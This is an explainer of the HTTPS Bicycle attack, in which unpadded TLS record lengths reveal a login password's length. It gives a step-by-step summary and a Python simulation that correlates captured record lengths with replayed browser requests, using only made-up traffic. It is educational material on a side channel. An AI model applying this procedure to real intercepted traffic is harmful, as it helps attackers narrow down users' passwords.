How the HTTPS Bicycle Attack Works

It is usually assumed that HTTP traffic encapsulated in TLS does not reveal the exact sizes of its parts, such as the length of a Cookie header or the payload of an HTTP POST request that may carry variable-length credentials such as passwords. With stream ciphers and AEAD cipher suites that add no padding, however, each TLS record's ciphertext is exactly the plaintext length plus a fixed per-record overhead, so request lengths leak through the encryption.

The Bicycle attack, in the context of obtaining the length of a user's password from a browser request, is fairly simple. All an attacker needs is a packet capture of requests to a known site, including an authentication (login) request that contains an already known username and an unknown plain-text password. If the attacker can determine the user's browser and how that browser formats its requests to the site, they can subtract the length of everything the browser is known to send except the field of interest; what remains is the length of the unknown data. Note that the request length must be reconstructed carefully: a field such as Content-Length changes its own length (number of digits) as the body grows, so it is computed for each candidate length rather than treated as a constant.

Summary:

  • Obtain a packet capture (e.g. from a man-in-the-middle position or passive access to the network path) containing stream-cipher TLS traffic of encrypted browser requests to a known website, including one where a password was likely sent in an authentication request. Because stream-cipher and AEAD suites do not pad, record lengths track plaintext lengths. The target site may be revealed in the packet capture in the form of a DNS request (or the TLS SNI field), or the attacker may be able to find it out with some reconnaissance.
  • Obtain a "User-Agent" string from the packet capture or determine which browser the target was using.
  • Replicate browser requests to the site using the same browser. This will reveal the lengths of the requests to various pages on the site.
  • From the encrypted TLS payloads of the browser requests in the packet capture, extract the lengths of the payloads.
  • Compute the Pearson correlation coefficient between the sequence of plain-text request lengths (from the replayed browsing) and the sequence of encrypted record lengths (from the capture). The alignment with the highest correlation reveals which encrypted TLS requests correspond to which pages (URLs) of the website, including the login request, whose only unknown component is then the password length.
source: eccouncil.org
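The procedure above, as an added worked example that is not part of the original post or of EC-Council's material. Everything in it is constructed for illustration: the site (`shop.example`), the hypothetical browser request template, the "captured" record lengths, and a 24-byte per-record TLS overhead standing in for an AES-GCM explicit nonce plus authentication tag. A real attacker measures the overhead and the browser's exact request bytes from their own traffic rather than assuming them.

```python
"""Simulation of the length-only reasoning behind the HTTPS Bicycle attack.

Added example, not from the original page. All names, the request template,
the capture and the TLS overhead below are constructed assumptions.
"""
from math import sqrt

HOST = "shop.example"  # constructed target site
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) ExampleBrowser/1.0"  # constructed


def build_request(method: str, path: str, body: bytes = b"") -> bytes:
    """Exact bytes the (hypothetical) browser sends for one request.
    An attacker learns this template by replaying requests with the same browser."""
    lines = [
        f"{method} {path} HTTP/1.1",
        f"Host: {HOST}",
        f"User-Agent: {USER_AGENT}",
        "Accept: text/html,application/xhtml+xml",
        "Accept-Language: en-US,en;q=0.5",
        "Connection: keep-alive",
    ]
    if method == "POST":
        lines.append("Content-Type: application/x-www-form-urlencoded")
        # Content-Length's digit count grows with the body, so it is recomputed
        # for every candidate body size instead of being treated as fixed.
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


# Stream-cipher / AEAD suites add a constant per record and no padding.
# 24 bytes is a constructed stand-in for an AES-GCM explicit nonce (8) + tag (16).
TLS_RECORD_OVERHEAD = 24


def record_len(plaintext: bytes) -> int:
    """Ciphertext length of one unpadded TLS record carrying `plaintext`."""
    return len(plaintext) + TLS_RECORD_OVERHEAD


def pearson(xs, ys) -> float:
    """Pearson correlation coefficient of two equal-length sequences."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    vx = sum((x - mx) ** 2 for x in xs)
    vy = sum((y - my) ** 2 for y in ys)
    return 0.0 if vx == 0 or vy == 0 else cov / sqrt(vx * vy)


def align_capture(captured_lens, replayed_lens):
    """Slide the replayed plaintext-length sequence over the captured record
    lengths; return (offset, r) where the correlation is highest."""
    best = (None, -2.0)
    for off in range(len(captured_lens) - len(replayed_lens) + 1):
        r = pearson(captured_lens[off:off + len(replayed_lens)], replayed_lens)
        if r > best[1]:
            best = (off, r)
    return best


def recover_password_length(login_record_len: int, username: str, max_len: int = 128):
    """Smallest password length whose login POST yields the captured record length.
    Lengths grow strictly with the password, so the first match is the only one."""
    for n in range(max_len + 1):
        body = f"username={username}&password={'x' * n}".encode()
        if record_len(build_request("POST", "/login", body)) == login_record_len:
            return n
    return None


# --- constructed victim session (what the browser really sent) -------------
SECRET_PASSWORD = "correct horse battery"  # unknown to the attacker
VICTIM_SESSION = [
    build_request("GET", "/"),
    build_request("GET", "/static/site.css"),
    build_request("GET", "/static/app.js"),
    build_request("GET", "/account/login"),
    build_request("POST", "/login",
                  f"username=alice&password={SECRET_PASSWORD}".encode()),
    build_request("GET", "/account/orders"),
]
# The attacker sees only ciphertext lengths, here wrapped in unrelated records.
CAPTURED_LENS = [517, 1203] + [record_len(r) for r in VICTIM_SESSION] + [388]

# --- attacker side: replay the page sequence with the same browser ----------
REPLAYED_PATH = ["/", "/static/site.css", "/static/app.js", "/account/login"]
REPLAYED_LENS = [len(build_request("GET", p)) for p in REPLAYED_PATH]


def run_attack():
    """Align capture to replay, pick the record after the login page as the POST,
    and solve for the password length. Returns (offset, r, password_length)."""
    off, r = align_capture(CAPTURED_LENS, REPLAYED_LENS)
    login_record = CAPTURED_LENS[off + len(REPLAYED_LENS)]
    return off, round(r, 3), recover_password_length(login_record, "alice")


if __name__ == "__main__":
    print(run_attack())
```

Two practical caveats the simulation hides: the recovered value is the length of the form-encoded password (a space sent as `%20` counts as three bytes), and the technique depends on the request bytes being predictable, which HTTP/2 header compression and TLS 1.3 record padding both undermine.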